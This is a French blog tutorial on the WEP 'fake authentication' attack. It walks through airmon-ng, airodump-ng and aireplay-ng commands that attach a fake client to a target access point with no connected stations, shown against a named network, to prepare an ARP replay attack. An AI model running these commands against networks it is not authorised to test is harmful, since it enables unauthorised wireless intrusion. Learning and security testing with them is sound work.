Attaque WEP : Fake Authentication

To the non-french speaker, note that you can translate the articles using the Google Trad widget situated at the bottom of all pages.


Le but de cet article va être de vous montrer comment créer un faux client sur un réseau WEP. Cette attaque va nous être particulièrement utile lorsque aucun hôte ne sera connecté au point d’accès. Et oui, sans client il sera impossible de capturer les trames ARP et de les rejouer. Donc l’attaque par rejeu d’ARP sera infaisable.

Pour créer notre faux client nous aurons besoin d’une carte Wi-Fi externe. Pour ma part j’utilise la AWUS036H que vous pouvez acheter sur le site du revendeur officiel wifi-highpower.

Avant toute chose nous allons prendre les deux adresses MAC de nos interfaces Wi-FI que nous allons stocké dans un fichier texte (ça nous servira plus tard).

Pour cela tapez la commande

ifconfig

iface.png

Wlan0 est l’interface Wi-Fi de mon PC et wlan1 ma carte externe.

Ensuite nous allons devoir trouver le BSSID du point d’accès à attaquer, c’est à dire son adresse MAC.

Pour cela on va passer notre carte Wi-Fi en mode monitor :

airmon-ng start wlan1

Puis on va lancer la commande suivante :

airodump-ng --encrypt wep wlan1mon

Cette commande va nous afficher tous les points d’accès qui utilisent le protocole WEP.

channel.png

Voilà notre cible. Ce qu’il faut retenir de ce résultat, c’est le BSSID ainsi que le canal utilisé (ici le canal 1). Ensuite il va falloir cibler plus précisément notre victime pour cela on utilise cette commande :

airodump-ng --bssid "BSSID du réseau"  --channel "Canal utilisé" "Interface Wi-Fi en monitor"

Voici la commande que j’utilise :

airodump-ng –bssid 24:EC:99:A5:E0:9B –channel 1 wlan1mon

nohost.png

Vous pouvez voir qu’il n’y a aucune stations de connectés au point d’accès.

A partir de là il va falloir utiliser un second terminal. Pour créer notre faux client on va se servir d’aireplay-ng. Voici la commande à utiliser :

aireplay-ng -1 0 -e "ESSID du réseau" -b "BSSID du réseau" -h "Adresse Mac de la carte externe" wlan1mon

La commande que j’utilise est :

aireplay-ng -1 0 -e NUMERICABLE-52D1 -b 24:EC:99:A5:E0:9B -h 92:2d:d9:e4:82:c9 wlan1mon

Et voici ce que l’on obtient :

aireplay.png

Maintenant si on retourne sur airodump :

host.png

On voit bien qu’il y a un nouvel hôte qui a la même adresse MAC que ma carte Wi-Fi externe.

Et voila ! Maintenant que nous avons un client connecté au point d’accès nous pourrons nous servir de lui pour lancer l’attaque par rejeu d’ARP !

3 commentaires

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l'aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s